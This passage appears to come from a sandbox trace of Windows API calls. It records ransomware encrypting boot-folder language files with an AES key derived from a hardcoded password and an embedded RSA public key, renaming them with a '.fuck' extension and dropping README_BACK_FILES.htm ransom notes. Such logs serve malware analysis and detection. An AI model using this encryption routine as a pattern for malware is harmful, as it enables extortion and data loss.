dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.646] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.646] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.647] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.648] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.648] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.648] CryptHashData (hHash=0x27ff5d8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.648] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff5d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff218) returned 1 [0140.649] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.649] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.649] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2813730) returned 1 [0140.649] CryptImportPublicKeyInfo (in: hCryptProv=0x2813730, dwCertEncodingType=0x1, pInfo=0x28015c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28015f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28015f8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fec18) returned 1 [0140.649] CryptEncrypt (in: hKey=0x27fec18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.649] CryptEncrypt (in: hKey=0x27fec18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2813ae8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2813ae8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.649] WriteFile (in: hFile=0x5d54, lpBuffer=0x2813ae8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2813ae8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.650] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.650] CryptEncrypt (in: hKey=0x27ff218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.651] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.651] CloseHandle (hObject=0xffffffff) returned 1 [0140.651] CloseHandle (hObject=0x5d54) returned 1 [0140.652] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.655] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.655] DeleteFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.gsg")) returned 1 [0140.657] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.fuck")) returned 0 [0140.657] CryptDestroyHash (hHash=0x27ff5d8) returned 1 [0140.657] CryptDestroyKey (hKey=0x27ff218) returned 1 [0140.657] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.657] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.657] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.657] GetLastError () returned 0x5 [0140.657] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui")) returned 0x20 [0140.657] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.658] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.658] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.658] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.659] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x28131e0) returned 1 [0140.660] CryptCreateHash (in: hProv=0x28131e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.660] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.660] CryptHashData (hHash=0x27ff5d8, pbData=0x5bcd68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.660] CryptDeriveKey (in: hProv=0x28131e0, Algid=0x6610, hBaseData=0x27ff5d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff218) returned 1 [0140.660] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.660] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.660] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2813510) returned 1 [0140.661] CryptImportPublicKeyInfo (in: hCryptProv=0x2813510, dwCertEncodingType=0x1, pInfo=0x28010e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2801110*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2801118*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fea18) returned 1 [0140.661] CryptEncrypt (in: hKey=0x27fea18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.661] CryptEncrypt (in: hKey=0x27fea18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28130d0*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28130d0*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.661] WriteFile (in: hFile=0x5d54, lpBuffer=0x28130d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28130d0*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.662] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.662] CryptEncrypt (in: hKey=0x27ff218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.662] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.662] CloseHandle (hObject=0xffffffff) returned 1 [0140.662] CloseHandle (hObject=0x5d54) returned 1 [0140.663] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.666] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.666] DeleteFileA (lpFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.gsg")) returned 1 [0140.667] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-cn\\memtest.exe.mui.fuck")) returned 0 [0140.667] CryptDestroyHash (hHash=0x27ff5d8) returned 1 [0140.667] CryptDestroyKey (hKey=0x27ff218) returned 1 [0140.667] CryptReleaseContext (hProv=0x28131e0, dwFlags=0x0) returned 1 [0140.667] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.667] FindClose (in: hFindFile=0x27ff358 | out: hFindFile=0x27ff358) returned 1 [0140.667] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-cn\\readme_back_files.htm")) returned 0xffffffff [0140.668] AreFileApisANSI () returned 1 [0140.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.668] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\README_BACK_FILES.htm" (normalized: "c:\\boot\\zh-cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.689] GetFileType (hFile=0x5d50) returned 0x1 [0140.689] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.690] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.690] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-HK\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0140.690] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.690] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.690] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.690] GetLastError () returned 0x0 [0140.690] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui")) returned 0x20 [0140.690] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.691] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.691] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.691] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.692] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2813f28) returned 1 [0140.693] CryptCreateHash (in: hProv=0x2813f28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.693] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.693] CryptHashData (hHash=0x27ff218, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.693] CryptDeriveKey (in: hProv=0x2813f28, Algid=0x6610, hBaseData=0x27ff218, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.694] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.694] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.694] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2813620) returned 1 [0140.694] CryptImportPublicKeyInfo (in: hCryptProv=0x2813620, dwCertEncodingType=0x1, pInfo=0x28011b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28011e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28011e8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fe898) returned 1 [0140.694] CryptEncrypt (in: hKey=0x27fe898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.694] CryptEncrypt (in: hKey=0x27fe898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2812f38*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2812f38*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.694] WriteFile (in: hFile=0x5d54, lpBuffer=0x2812f38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2812f38*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.695] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.695] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.695] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.695] CloseHandle (hObject=0xffffffff) returned 1 [0140.695] CloseHandle (hObject=0x5d54) returned 1 [0140.698] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.701] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.701] DeleteFileA (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.gsg")) returned 1 [0140.702] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.fuck")) returned 0 [0140.703] CryptDestroyHash (hHash=0x27ff218) returned 1 [0140.703] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.703] CryptReleaseContext (hProv=0x2813f28, dwFlags=0x0) returned 1 [0140.703] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.703] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.703] GetLastError () returned 0x5 [0140.703] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui")) returned 0x20 [0140.704] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.704] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.704] CreateFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.705] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.705] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2813378) returned 1 [0140.707] CryptCreateHash (in: hProv=0x2813378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.707] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.707] CryptHashData (hHash=0x27ff358, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.707] CryptDeriveKey (in: hProv=0x2813378, Algid=0x6610, hBaseData=0x27ff358, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.707] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.707] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.707] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28132f0) returned 1 [0140.707] CryptImportPublicKeyInfo (in: hCryptProv=0x28132f0, dwCertEncodingType=0x1, pInfo=0x2801280*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28012b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28012b8*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fead8) returned 1 [0140.708] CryptEncrypt (in: hKey=0x27fead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.708] CryptEncrypt (in: hKey=0x27fead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28137b8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x28137b8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.708] WriteFile (in: hFile=0x5d54, lpBuffer=0x28137b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x28137b8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.709] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.709] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.709] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.709] CloseHandle (hObject=0xffffffff) returned 1 [0140.709] CloseHandle (hObject=0x5d54) returned 1 [0140.709] CopyFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.713] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.713] DeleteFileA (lpFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.gsg")) returned 1 [0140.714] MoveFileA (lpExistingFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\zh-hk\\memtest.exe.mui.fuck")) returned 0 [0140.715] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.715] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.715] CryptReleaseContext (hProv=0x2813378, dwFlags=0x0) returned 1 [0140.715] FindNextFileA (in: 